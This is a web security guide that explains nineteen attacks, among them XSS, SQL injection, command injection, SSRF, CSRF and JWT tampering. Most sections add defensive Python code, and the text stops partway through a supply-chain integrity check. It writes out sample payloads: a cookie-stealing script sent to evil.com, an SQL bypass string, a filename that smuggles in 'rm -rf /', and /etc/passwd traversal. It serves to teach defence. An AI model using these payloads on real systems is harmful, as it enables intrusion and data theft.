Guide: The Main Web Attacks
1. XSS (Cross-Site Scripting)
Description: XSS is a vulnerability where an attacker injects malicious JavaScript code into a web page. This code runs in the browsers of other users who visit the page.
Why and for what: Allows stealing session cookies, redirecting users to phishing sites, displaying fake login forms, or logging keystrokes.
Attack example: A site allows users to leave comments without filtering tags. The attacker posts:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
When other users view the comment, their browser sends session cookies to the attacker’s server.
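Added example (Python, not from the original guide): the comment payload above rendered by a vulnerable template and by one that escapes output, plus the response headers that limit the damage even if an injection slips through. The comment text, header values and cookie name are constructed for the demo.

```python
import html

# Constructed sample comment, the same payload shape as the example above
MALICIOUS_COMMENT = "<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>"

def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user input is concatenated straight into the HTML document
    return f"<div class='comment'>{comment}</div>"

def render_comment_safe(comment: str) -> str:
    # Fixed: <, >, &, and quotes are escaped, so the browser treats the text as data, not markup
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"

def security_headers() -> dict:
    # Defence in depth (constructed values): a CSP that refuses inline scripts, and a
    # session cookie that page JavaScript cannot read, so document.cookie has nothing to steal
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "session=SESSION_ID_PLACEHOLDER; HttpOnly; Secure; SameSite=Lax",
    }

def contains_script_tag(rendered_html: str) -> bool:
    # Check used by the demo: would the browser see a live <script> element?
    return "<script" in rendered_html.lower()

if __name__ == "__main__":
    print("unsafe:", render_comment_unsafe(MALICIOUS_COMMENT))
    print("safe:  ", render_comment_safe(MALICIOUS_COMMENT))
    print(security_headers())
```

Escaping on output is the fix; the headers are a second layer, because a CSP without 'unsafe-inline' blocks the injected script from running at all and HttpOnly keeps the session cookie out of reach of any script that does run.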
2. SQL Injection (SQLi)
Description: SQL Injection is when an attacker inserts malicious SQL commands into input fields that are directly used in database queries without proper sanitization.
Why and for what: Allows bypassing authentication, stealing, modifying, or deleting data from the database.
Attack example: Login query:
SELECT * FROM users WHERE username = '$input_username' AND password = '$input_password'
Attacker inputs:
' OR '1'='1
Resulting query:
SELECT * FROM users WHERE username = '' OR '1'='1'
The condition is always true, so the attacker logs in without knowing a password.
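Added example (Python with the built-in sqlite3 module, not from the original guide): the login query above built by string concatenation next to the same query with bound parameters. The users table and the account in it are constructed for the demo; the payload is the one from the text, entered in both fields.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed in-memory users table with one account. Real systems store a password
    # hash, not the password; plain text keeps the injection point easy to see here.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'correct horse battery staple')")
    conn.commit()
    return conn

def login_vulnerable(conn, username: str, password: str):
    # Vulnerable: the input is spliced into the SQL text, exactly like the query above
    query = (f"SELECT id, username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone()

def login_safe(conn, username: str, password: str):
    # Fixed: placeholders make the driver pass the values as data, never as SQL
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()

PAYLOAD = "' OR '1'='1"   # the input from the example above

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", login_vulnerable(conn, PAYLOAD, PAYLOAD))
    print("safe:      ", login_safe(conn, PAYLOAD, PAYLOAD))
```

With the payload in both fields the concatenated query ends in `OR '1'='1'`, so the first row comes back and the vulnerable login succeeds; the parameterised version looks for a user literally named `' OR '1'='1` and finds nothing.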
3. Remote Code Execution (RCE)
Description: RCE is a vulnerability that allows an attacker to execute arbitrary commands on the server.
Why and for what: Full server takeover, deleting or stealing files, installing malware.
Attack example: A site runs a command after file upload:
convert $filename output.pdf
If the attacker uploads a file named:
file.png; rm -rf /
The server executes rm -rf /, deleting all files.
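Added example (Python, not from the original guide): the upload-then-convert step above done the vulnerable way (one command string for a shell) and the safe way (an allowlisted filename passed as a separate argv element). The filename pattern and the hostile name are constructed; Python itself stands in for the `convert` tool so the demo runs anywhere.

```python
import re
import subprocess
import sys

# Constructed sample: the hostile upload name from the example above
HOSTILE_NAME = "file.png; rm -rf /"

# Allowlist: plain base name plus an image extension. No '/', no spaces, no shell
# metacharacters, and no leading '-' (which a tool could read as an option).
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.(png|jpe?g|gif)$")

def is_safe_filename(name: str) -> bool:
    return SAFE_NAME.fullmatch(name) is not None

def build_command_unsafe(filename: str) -> str:
    # Vulnerable: a single string for a shell, where ';' ends one command and starts another
    return f"convert {filename} output.pdf"

def build_command_safe(filename: str) -> list:
    # Fixed: validate the name, then build an argv list to run with shell=False, so the
    # name reaches the program as exactly one argument whatever characters it contains
    if not is_safe_filename(filename):
        raise ValueError("rejected upload name")
    return ["convert", filename, "output.pdf"]

def accepted(filename: str) -> bool:
    try:
        build_command_safe(filename)
        return True
    except ValueError:
        return False

def echo_argv(filename: str) -> str:
    # Shows that argv passing keeps the name intact: Python stands in for `convert`
    # and prints back its first argument unchanged
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", filename],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout
```

The allowlist is the real control; the argv list is what makes the remaining risk zero for metacharacters, since nothing interprets `;` when no shell is involved. Storing uploads under a server-generated name and never reusing the client's name removes the problem entirely.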
4. LFI / RFI (Local / Remote File Inclusion)
Description: The attacker tricks the server into loading local or remote files that should not be accessible.
Why and for what: To read sensitive system files or execute malicious remote code.
Attack example: URL:
https://site.com/page.php?file=../../../../etc/passwd
Returns system password file content instead of the page.
5. CSRF (Cross-Site Request Forgery)
Description: Forces a logged-in user’s browser to perform unwanted actions on a trusted site without their knowledge.
Why and for what: Unauthorized money transfers, password changes, data deletion.
Attack example: User is logged into their bank. Attacker sends an email with:
<img src="https://bank.com/transfer?to=attacker&amount=1000">
Opening the email triggers a money transfer request automatically.
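Added example (Python, not from the original guide): the transfer endpoint from the bank scenario above protected three ways: it only accepts POST (so an image fetch can never trigger it), it checks a per-session CSRF token, and the session cookie carries SameSite. The session store, form fields and cookie name are constructed for the demo.

```python
import hmac
import secrets

class Forbidden(Exception):
    pass

def issue_csrf_token(session: dict) -> str:
    # One unguessable token per session, embedded in every state-changing form
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token

def check_csrf(session: dict, submitted) -> None:
    expected = session.get("csrf_token")
    # compare_digest: constant-time, so the check itself leaks nothing about the token
    if not expected or not submitted or not hmac.compare_digest(expected, submitted):
        raise Forbidden("CSRF token missing or wrong")

def session_cookie() -> str:
    # SameSite stops the browser attaching the cookie to cross-site requests, which
    # defeats the <img> trick above before the token check even runs (constructed value)
    return "session=SESSION_ID_PLACEHOLDER; HttpOnly; Secure; SameSite=Lax"

def handle_transfer(method: str, session: dict, form: dict) -> str:
    # State-changing actions are POST-only; a GET (what an <img> performs) is refused
    if method != "POST":
        raise Forbidden("transfers must be POSTed")
    check_csrf(session, form.get("csrf_token"))
    return f"transferred {form['amount']} to {form['to']}"

def attempt(method: str, session: dict, form: dict) -> str:
    try:
        return handle_transfer(method, session, form)
    except Forbidden as exc:
        return f"denied: {exc}"
```

A page on evil.com can make the victim's browser send the request, but it cannot read the token out of the bank's page, so it cannot produce a form that passes check_csrf.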
6. Broken Access Control
Description: Failure to properly check user permissions, allowing access to unauthorized data or actions.
Why and for what: Accessing other users’ accounts, admin panels, or modifying data.
Attack example: User views profile:
https://site.com/profile?id=123
Changing id to 124 shows someone else’s profile because ownership of the requested record is never verified.
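Added example (Python, not from the original guide): the profile lookup above with an object-level authorization check, and a small record of denied requests so that someone stepping through ids 123, 124, 125... shows up in monitoring. The profile store and user names are constructed.

```python
import logging

log = logging.getLogger("authz")
DENIALS = []   # in-memory record of refused requests, for alerting on id-guessing sprees

class Forbidden(Exception):
    pass

# Constructed profile store: id -> owner and data
PROFILES = {
    123: {"owner": "alice", "email": "alice@example.com"},
    124: {"owner": "bob", "email": "bob@example.com"},
}

def view_profile(requester: str, is_admin: bool, profile_id: int) -> dict:
    """Object-level authorization: the id in the URL is never trusted on its own."""
    profile = PROFILES.get(profile_id)
    # A missing profile and a forbidden one give the same error, so ids cannot be enumerated
    if profile is None or (profile["owner"] != requester and not is_admin):
        DENIALS.append((requester, profile_id))
        log.warning("denied: %s requested profile %s", requester, profile_id)
        raise Forbidden("profile not available")
    return dict(profile)

def attempt_view(requester: str, is_admin: bool, profile_id: int):
    try:
        return view_profile(requester, is_admin, profile_id)
    except Forbidden:
        return None

def suspicious_requesters(threshold: int = 3) -> set:
    """Requesters with at least `threshold` denials, a sign of id enumeration."""
    counts = {}
    for requester, _ in DENIALS:
        counts[requester] = counts.get(requester, 0) + 1
    return {r for r, n in counts.items() if n >= threshold}
```

The check compares the record's owner with the authenticated identity taken from the session, never with anything in the request; the admin flag likewise comes from the session, not from a parameter.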
7. Directory Traversal
Description: Tricks the site into reading files outside the web root directory by using path sequences such as ../ in a file parameter.
Why and for what: Steal passwords, config files, or map server file structure.
Attack example: Request:
https://site.com/view?file=../../../etc/passwd
Returns system password file content.
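Added example (Python, not from the original guide), serving both section 4 (LFI / RFI) and section 7 (Directory Traversal): a `file` parameter like the ones in the two URLs above is resolved against the web root and refused if it escapes it, is URL-encoded traversal, or names a remote URL. The web root path is an assumption for the demo.

```python
import os
from urllib.parse import unquote, urlsplit

WEB_ROOT = "/var/www/pages"  # assumed document root for this demo

def is_remote(param: str) -> bool:
    # RFI guard: a scheme ("http:", "ftp:") or a protocol-relative "//" means the
    # parameter names a URL, not a file under the web root
    return urlsplit(param).scheme != "" or param.startswith(("//", "\\\\"))

def safe_join(root: str, user_path: str):
    """Return the absolute path for user_path inside root, or None if it escapes."""
    decoded = unquote(user_path)          # decode once, so %2e%2e is seen as ..
    if "\x00" in decoded or is_remote(decoded) or os.path.isabs(decoded):
        return None
    root_abs = os.path.normpath(os.path.abspath(root))
    candidate = os.path.normpath(os.path.join(root_abs, decoded))
    # commonpath is a true ancestor test; a plain startswith(root) check would
    # accept /var/www/pages_old for a root of /var/www/pages
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        return None
    return candidate

def load_page(root: str, param: str) -> str:
    """Read the requested page; the safe replacement for include($_GET['file'])."""
    path = safe_join(root, param)
    if path is None or not path.endswith(".html"):
        raise PermissionError("rejected file parameter")
    with open(path, encoding="utf-8") as fh:
        return fh.read()
```

safe_join works on the path text only; if the web root can contain symlinks, resolve the candidate with os.path.realpath before the commonpath test so a link pointing outside the root is caught too. Simpler still is a fixed map from page names to files, with no path in the parameter at all.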
8. SSRF (Server-Side Request Forgery)
Description: Forces the server to make HTTP requests to internal or external resources on behalf of the attacker.
Why and for what: Access internal services, bypass firewalls, conduct further attacks.
Attack example: Parameter:
https://site.com/fetch?url=http://localhost/admin
Server fetches internal admin page not accessible externally.
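Added example (Python, not from the original guide): validation for the `url` parameter of a fetch endpoint like the one above. Only http/https is accepted, the host is resolved, and the resulting address must be a public one, which rules out localhost, RFC 1918 ranges and link-local addresses. The resolver is injectable; the fake DNS table is constructed so the demo runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS answers for the demo (a real deployment uses socket.gethostbyname)
FAKE_DNS = {"localhost": "127.0.0.1", "internal.corp": "10.0.0.5", "example.com": "93.184.216.34"}

def fake_resolve(host: str) -> str:
    if host not in FAKE_DNS:
        raise ValueError(f"unresolvable host {host}")
    return FAKE_DNS[host]

def is_public_ip(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    # is_global is False for loopback, private (RFC 1918), link-local (169.254.0.0/16,
    # where cloud metadata services live), unspecified (0.0.0.0) and other reserved ranges
    return ip.is_global

def validate_fetch_url(url: str, resolve=socket.gethostbyname) -> str:
    """Return the IP the fetch may connect to, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed")
    host = parts.hostname
    if not host or parts.username or parts.password:
        raise ValueError("bad host")
    try:
        ip_text = str(ipaddress.ip_address(host))   # literal address, including [::1]
    except ValueError:
        ip_text = resolve(host)                     # hostname: resolve it ourselves
    if not is_public_ip(ip_text):
        raise ValueError(f"target {ip_text} is not public")
    return ip_text

def fetch_allowed(url: str, resolve=socket.gethostbyname) -> bool:
    try:
        validate_fetch_url(url, resolve)
        return True
    except (ValueError, OSError):
        return False
```

Two details matter in the real fetch: connect to the IP that validate_fetch_url returned rather than letting the HTTP library resolve the name a second time (a name can change its answer between the check and the request), and disable automatic redirects, since a public host can otherwise redirect the server into the internal network.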
9. Clickjacking
Description: Tricks a user into clicking hidden or disguised elements.
Why and for what: Make the user perform unintended actions like deleting accounts.
Attack example: A “Play” button is overlaid with a transparent frame containing a “Delete Account” button.
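Added example (Python, not from the original guide): a small audit of a page's response headers for the two framing controls that stop the overlay trick above, the CSP frame-ancestors directive and X-Frame-Options. The header values it checks are real browser-supported values; the sample header sets in the test are constructed.

```python
def audit_framing_headers(headers: dict) -> list:
    """Return a list of findings; an empty list means the page cannot be framed by others."""
    lower = {k.lower(): v for k, v in headers.items()}
    findings = []
    xfo = lower.get("x-frame-options", "").strip().upper()
    csp = lower.get("content-security-policy", "")

    # Pull the frame-ancestors source list out of the CSP, if there is one
    frame_ancestors = None
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            frame_ancestors = value.strip()

    if frame_ancestors is None and xfo not in ("DENY", "SAMEORIGIN"):
        findings.append("no frame-ancestors directive and no DENY/SAMEORIGIN X-Frame-Options")
    if frame_ancestors is not None and "*" in frame_ancestors.split():
        findings.append("frame-ancestors allows any origin")
    if xfo.startswith("ALLOW-FROM"):
        findings.append("ALLOW-FROM is obsolete and ignored by current browsers")
    return findings

def recommended_headers() -> dict:
    # frame-ancestors is the modern control; X-Frame-Options covers older browsers
    return {"Content-Security-Policy": "frame-ancestors 'none'", "X-Frame-Options": "DENY"}
```

If the page legitimately needs to be embedded by a partner, list that origin in frame-ancestors instead of 'none'; the wildcard is what re-opens the clickjacking hole.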
10. Insecure Deserialization
Description: Deserializing attacker-controlled data without validation lets the attacker reconstruct objects whose loading executes arbitrary code.
Why and for what: Remote code execution, privilege escalation.
Attack example: Sending a crafted serialized object that executes code when deserialized.
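Added example (Python, not from the original guide): two defences against the crafted-object scenario above. The first is the one to prefer, a data-only format (JSON) plus explicit validation of each field. The second is for code that cannot get rid of pickle: an Unpickler that refuses every global lookup, which is the mechanism a crafted pickle uses to reach executable code. The sample pickles are constructed in the block itself.

```python
import collections
import io
import json
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    # Every reference to a class or function goes through find_class; refusing all of
    # them means a pickle can only rebuild plain data (dicts, lists, strings, numbers)
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def loads_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def rejects_globals(data: bytes) -> bool:
    try:
        loads_restricted(data)
        return False
    except pickle.UnpicklingError:
        return True

def load_order(data: bytes) -> dict:
    # Preferred route: JSON carries no code, and each field is checked for type and range
    obj = json.loads(data.decode("utf-8"))
    if not isinstance(obj, dict):
        raise ValueError("expected an object")
    item, qty = obj.get("item"), obj.get("qty")
    if not isinstance(item, str) or not item or isinstance(qty, bool) or not isinstance(qty, int) or qty <= 0:
        raise ValueError("bad order")
    return {"item": item, "qty": qty}

# Constructed samples: plain data, and an object that needs a global lookup to rebuild.
# OrderedDict is harmless; it stands in for any class reference a hostile pickle would carry.
SAMPLE_PLAIN = pickle.dumps({"item": "book", "qty": 2})
SAMPLE_WITH_GLOBAL = pickle.dumps(collections.OrderedDict(item="book"))
```

The restricted unpickler is a containment measure, not a reason to keep accepting pickle from the network; signing serialized blobs so only your own service can produce them is the other common control.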
11. Rate Limit Bypass
Description: Missing or bypassable restrictions on the number of requests a user or IP can make.
Why and for what: Brute force attacks, spam, denial of service.
Attack example: Automated scripts send thousands of login attempts per second.
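Added example (Python, not from the original guide): a sliding-window limiter applied to the login endpoint under two keys at once, the source IP and the target account. Keying only by IP is what lets attackers spread the thousands of attempts above across many addresses; the per-account key closes that gap. Limits and the clock are assumptions for the demo.

```python
import time
from collections import deque

class SlidingWindowLimiter:
    """Allow at most max_requests per key within any window_seconds span."""
    def __init__(self, max_requests: int, window_seconds: float, clock=time.monotonic):
        self.max_requests = max_requests
        self.window = window_seconds
        self.clock = clock   # injectable so behaviour can be tested without sleeping
        self.hits = {}       # key -> deque of request timestamps still inside the window

    def allow(self, key: str) -> bool:
        now = self.clock()
        stamps = self.hits.setdefault(key, deque())
        while stamps and now - stamps[0] >= self.window:
            stamps.popleft()          # drop timestamps that have aged out of the window
        if len(stamps) >= self.max_requests:
            return False
        stamps.append(now)
        return True

class LoginGuard:
    """Two keys: per source IP and per target account (assumed limits: 20/min and 5/min).
    Spreading attempts across many IPs still trips the account limit, and one IP
    cannot hammer many accounts."""
    def __init__(self, clock=time.monotonic):
        self.per_ip = SlidingWindowLimiter(20, 60, clock)
        self.per_account = SlidingWindowLimiter(5, 60, clock)

    def allowed(self, ip: str, username: str) -> bool:
        ip_ok = self.per_ip.allow(ip)
        account_ok = self.per_account.allow(username.lower())
        return ip_ok and account_ok

class FakeClock:
    def __init__(self, start: float = 0.0):
        self.t = start
    def now(self) -> float:
        return self.t
    def advance(self, seconds: float) -> None:
        self.t += seconds
```

In production the deques live in a shared store such as Redis so every application instance sees the same counts; an in-process limiter is bypassed simply by the load balancer spreading requests over several instances.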
12. Open Redirect
Description: Redirects users from a trusted website to a malicious one.
Why and for what: Phishing and abuse of trust.
Attack example: URL:
https://trusted.com/redirect?url=http://evil.com
User thinks they are on trusted.com but lands on a malicious site.
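Added example (Python, not from the original guide): validation for the `url` parameter of a redirect endpoint like the one above. Only same-site relative paths or absolute URLs whose host is on an allowlist are accepted; everything else falls back to a default page. The allowed host list is an assumption taken from the example URL.

```python
from urllib.parse import urlsplit

def safe_redirect_target(target, allowed_hosts=("trusted.com",), default="/") -> str:
    """Return target if it stays on an allowed site, otherwise the default page."""
    if not target:
        return default
    # Browsers treat a backslash like a forward slash in URLs, so normalise it first
    target = target.strip().replace("\\", "/")
    parts = urlsplit(target)

    if parts.scheme == "" and parts.netloc == "":
        # Relative target: a single leading slash keeps it on this site; "//host" would not
        if target.startswith("/") and not target.startswith("//"):
            return target
        return default

    if parts.scheme not in ("http", "https"):
        return default
    # hostname strips userinfo and port, so "trusted.com@evil.com" yields "evil.com"
    if (parts.hostname or "").lower() not in allowed_hosts:
        return default
    return target
```

Matching the whole hostname against a list, rather than checking that the URL "starts with" or "contains" trusted.com, is what defeats lookalikes such as trusted.com.evil.com.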
13. Subdomain Takeover
Description: Taking control of an unused or expired subdomain.
Why and for what: Hosting phishing or malware sites under trusted domain names.
Attack example: An expired subdomain old.example.com is registered by attacker and used maliciously.
14. HTTP Request Smuggling
Description: Manipulating HTTP requests to confuse proxies and servers, causing one request to be interpreted as two.
Why and for what: Bypass authentication, steal data from other users.
Attack example: Sending conflicting Content-Length headers to split requests.
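Added example (Python, not from the original guide): a framing check a proxy or server can run on an incoming request before forwarding it. It rejects the conflicting Content-Length case from the text and, going a step beyond it, the related ambiguity where Content-Length and Transfer-Encoding are both present or Transfer-Encoding carries an unrecognised coding. The sample requests are constructed.

```python
ALLOWED_CODINGS = {"chunked", "gzip", "deflate", "identity"}

def parse_headers(raw: bytes) -> list:
    """Return [(lower_name, value)] for the header block of a raw HTTP/1.1 request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = []
    for line in head.split("\r\n")[1:]:        # [0] is the request line
        if not line:
            continue
        name, sep, value = line.partition(":")
        # No colon, or whitespace before the colon, is a malformed field line
        if not sep or name != name.strip():
            headers.append(("<malformed>", line))
            continue
        headers.append((name.lower(), value.strip()))
    return headers

def validate_framing(raw: bytes):
    """Return (ok, reason). Anything a front end and back end might frame differently is refused."""
    headers = parse_headers(raw)
    if any(name == "<malformed>" for name, _ in headers):
        return False, "malformed header line"
    cls = [v for n, v in headers if n == "content-length"]
    tes = [v for n, v in headers if n == "transfer-encoding"]
    if cls and tes:
        return False, "both Content-Length and Transfer-Encoding present"
    if len(set(cls)) > 1:
        return False, "conflicting Content-Length values"
    if any(not v.isdigit() for v in cls):
        return False, "non-numeric Content-Length"
    if tes:
        codings = [c.strip().lower() for c in ",".join(tes).split(",")]
        if codings[-1] != "chunked" or not set(codings) <= ALLOWED_CODINGS:
            return False, "unsupported or unterminated Transfer-Encoding"
    return True, "ok"

# Constructed sample requests
CLEAN_POST = b"POST /login HTTP/1.1\r\nHost: site.com\r\nContent-Length: 9\r\n\r\nuser=a&p="
DOUBLE_CL = b"POST /login HTTP/1.1\r\nHost: site.com\r\nContent-Length: 6\r\nContent-Length: 50\r\n\r\n"
CL_AND_TE = b"POST /login HTTP/1.1\r\nHost: site.com\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
ODD_TE = b"POST /login HTTP/1.1\r\nHost: site.com\r\nTransfer-Encoding: xchunked\r\n\r\n"
```

Rejecting outright is the safe choice for a front end; the alternative of normalising (dropping Content-Length when chunked is present) only works if every hop behind it agrees on the same rule, which is exactly what request smuggling exploits. Using HTTP/2 end to end removes the problem because that protocol has no Content-Length/Transfer-Encoding ambiguity.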
15. Cache Poisoning
Description: Injecting malicious content into cached responses of proxies or browsers.
Why and for what: Serve fake pages to multiple users.
Attack example: Causing the server to emit a response containing malicious JavaScript, which a proxy then caches and serves to every other user who requests that page.
16. Padding Oracle / Crypto Attacks
Description: Exploiting cryptographic weaknesses to decrypt or tamper with encrypted data.
Why and for what: Bypass encryption, steal data.
Attack example: Repeated queries to an oracle to decrypt ciphertext byte by byte.
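Added example (Python standard library only, not from the original guide): the structure that removes the oracle the byte-by-byte attack above relies on. Ciphertext is authenticated with HMAC (encrypt-then-MAC), the tag is checked in constant time before any decryption or padding work, and every failure raises the same exception. The cipher itself is a toy keystream built from HMAC, a stand-in for a real block cipher so the block runs without third-party packages; do not use it for actual encryption. Keys in the test are constructed.

```python
import hashlib
import hmac
import secrets

BLOCK = 16
TAG_LEN = 32

class DecryptionError(Exception):
    """The only error decrypt() raises: a bad tag and bad padding look identical to the caller."""

def _keystream(key: bytes, iv: bytes, length: int) -> bytes:
    # Toy keystream: HMAC-SHA256 in counter mode. Demo stand-in, not a real cipher.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK          # PKCS#7: n bytes of value n, always at least one
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise DecryptionError()
    return data[:-n]

def encrypt(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    iv = secrets.token_bytes(BLOCK)
    padded = pad(plaintext)
    ct = bytes(a ^ b for a, b in zip(padded, _keystream(enc_key, iv, len(padded))))
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()   # tag covers IV and ciphertext
    return iv + ct + tag

def decrypt(enc_key: bytes, mac_key: bytes, blob: bytes) -> bytes:
    if len(blob) < BLOCK + TAG_LEN or (len(blob) - BLOCK - TAG_LEN) % BLOCK:
        raise DecryptionError()
    iv, ct, tag = blob[:BLOCK], blob[BLOCK:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    # Constant-time check, and BEFORE decrypting: tampered ciphertext never reaches unpad(),
    # so whether its padding would have been valid is never observable
    if not hmac.compare_digest(tag, expected):
        raise DecryptionError()
    padded = bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, iv, len(ct))))
    return unpad(padded)

def decrypt_outcome(enc_key: bytes, mac_key: bytes, blob: bytes) -> str:
    """What a caller (or a network observer) gets to see: one of exactly two outcomes."""
    try:
        return "ok:" + decrypt(enc_key, mac_key, blob).hex()
    except DecryptionError:
        return "error"

def flip_byte(blob: bytes, index: int) -> bytes:
    modified = bytearray(blob)
    modified[index] ^= 0x01
    return bytes(modified)
```

In real systems use an AEAD mode such as AES-GCM or ChaCha20-Poly1305, which bundles this tag-first behaviour into the primitive; the point of the block is the ordering and the single error path, which is the same whatever the cipher.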
17. Mass Assignment
Description: Changing hidden or unauthorized fields in API requests.
Why and for what: Escalate privileges (e.g., set isAdmin to true).
Attack example: Sending JSON payload:
{
  "username": "user",
  "isAdmin": true
}
Server accepts and grants admin rights.
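Added example (Python, not from the original guide): the JSON payload above applied to a user record by a vulnerable "bind everything" update and by an allowlist update that only binds fields the caller is entitled to set and reports the rest. The field names and the sample user record are constructed.

```python
import json

USER_WRITABLE = {"username", "email", "display_name"}  # fields a user may change on their own account
PRIVILEGED = {"isAdmin", "role", "balance"}             # fields only an administrator may set

def apply_update_unsafe(user: dict, payload_json: str) -> dict:
    # Vulnerable: every key in the request body is written straight into the record
    return {**user, **json.loads(payload_json)}

def apply_update(user: dict, payload_json: str, actor_is_admin: bool = False):
    """Allowlist binding. Returns (updated_record, rejected_fields). A non-empty rejected
    list should become a 400 response and a log line rather than being silently dropped,
    since a client sending isAdmin is worth knowing about."""
    payload = json.loads(payload_json)
    if not isinstance(payload, dict):
        raise ValueError("expected a JSON object")
    allowed = USER_WRITABLE | (PRIVILEGED if actor_is_admin else set())
    rejected = sorted(set(payload) - allowed)
    updated = dict(user)
    for key in allowed & set(payload):
        updated[key] = payload[key]
    return updated, rejected

# Constructed samples: the request body from the example above and the stored record
PAYLOAD = '{"username": "user", "isAdmin": true}'
CURRENT_USER = {"id": 7, "username": "user", "email": "user@example.com", "isAdmin": False}
```

The allowlist lives in code next to the endpoint, so adding a new sensitive column to the table cannot silently become client-writable; a denylist of "hidden" fields has the opposite failure mode.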
18. JWT Tampering
Description: Modifying JSON Web Tokens to gain unauthorized access.
Why and for what: Impersonate users or escalate privileges.
Attack example: Changing the user ID in the token payload and relying on the server not to check that the signature still matches.
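Added example (Python standard library only, not from the original guide): an HS256 verifier that rejects the edited-payload token from the scenario above, along with the signer needed to produce a valid token for the demo. The algorithm is pinned on the server side rather than read from the token header, and expiry is checked after the signature. Keys and claims in the test are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

class InvalidToken(Exception):
    pass

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _json_bytes(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":"), sort_keys=True).encode("utf-8")

def sign_hs256(claims: dict, key: bytes) -> str:
    header = _b64url(_json_bytes({"alg": "HS256", "typ": "JWT"}))
    signing_input = header + "." + _b64url(_json_bytes(claims))
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)

def verify_hs256(token: str, key: bytes, now: float = None) -> dict:
    """Return the claims only if the signature is valid for `key` and the token is unexpired."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(_unb64url(h64))
        claims = json.loads(_unb64url(p64))
        sig = _unb64url(s64)
    except ValueError as exc:                  # wrong part count, bad base64 or bad JSON
        raise InvalidToken("malformed token") from exc
    # The algorithm is pinned here; whatever the header claims about it is never trusted
    if header.get("alg") != "HS256":
        raise InvalidToken("unexpected alg")
    expected = hmac.new(key, f"{h64}.{p64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise InvalidToken("signature does not match payload")
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise InvalidToken("expired")
    return claims

def is_valid(token: str, key: bytes, now: float = None) -> bool:
    try:
        verify_hs256(token, key, now)
        return True
    except InvalidToken:
        return False

def tamper_subject(token: str, new_sub) -> str:
    """Edit the payload and keep the original signature: the attack described above."""
    h64, p64, s64 = token.split(".")
    claims = json.loads(_unb64url(p64))
    claims["sub"] = new_sub
    return h64 + "." + _b64url(_json_bytes(claims)) + "." + s64
```

Because the signature covers the header and payload exactly as encoded, any change to the subject makes the HMAC comparison fail; the server never acts on claims it has not authenticated. In production use a maintained JWT library configured with an explicit list of accepted algorithms, which is the same pinning shown here.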
19. Supply Chain Attack
Description: Injecting malicious code into third-party libraries or tools used by many projects.
Why and for what: Mass compromise, backdoors.
Attack example: A compromised npm package contains malware that infects all projects using it.
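Added example (Python, not from the original guide): the integrity check that a lockfile makes possible against the swapped-package scenario above. Lockfiles such as npm's record a subresource-integrity string ("sha512-" followed by a base64 digest) for each package; the functions below compute and verify that format. The package bytes, lock entry and registry URL are constructed for the demo.

```python
import base64
import hashlib
import hmac

SRI_ALGORITHMS = ("sha512", "sha384", "sha256")

def compute_integrity(tarball: bytes, algorithm: str = "sha512") -> str:
    digest = hashlib.new(algorithm, tarball).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"

def verify_integrity(tarball: bytes, integrity_field: str) -> bool:
    # SRI allows several space-separated entries; the download passes if any strong one matches
    for entry in integrity_field.split():
        alg, _, b64 = entry.partition("-")
        if alg not in SRI_ALGORITHMS:
            continue
        expected = base64.b64decode(b64)
        actual = hashlib.new(alg, tarball).digest()
        if hmac.compare_digest(expected, actual):
            return True
    return False

def check_lock_entry(entry: dict, tarball: bytes) -> str:
    """Decide whether a downloaded tarball is the one the lockfile pinned."""
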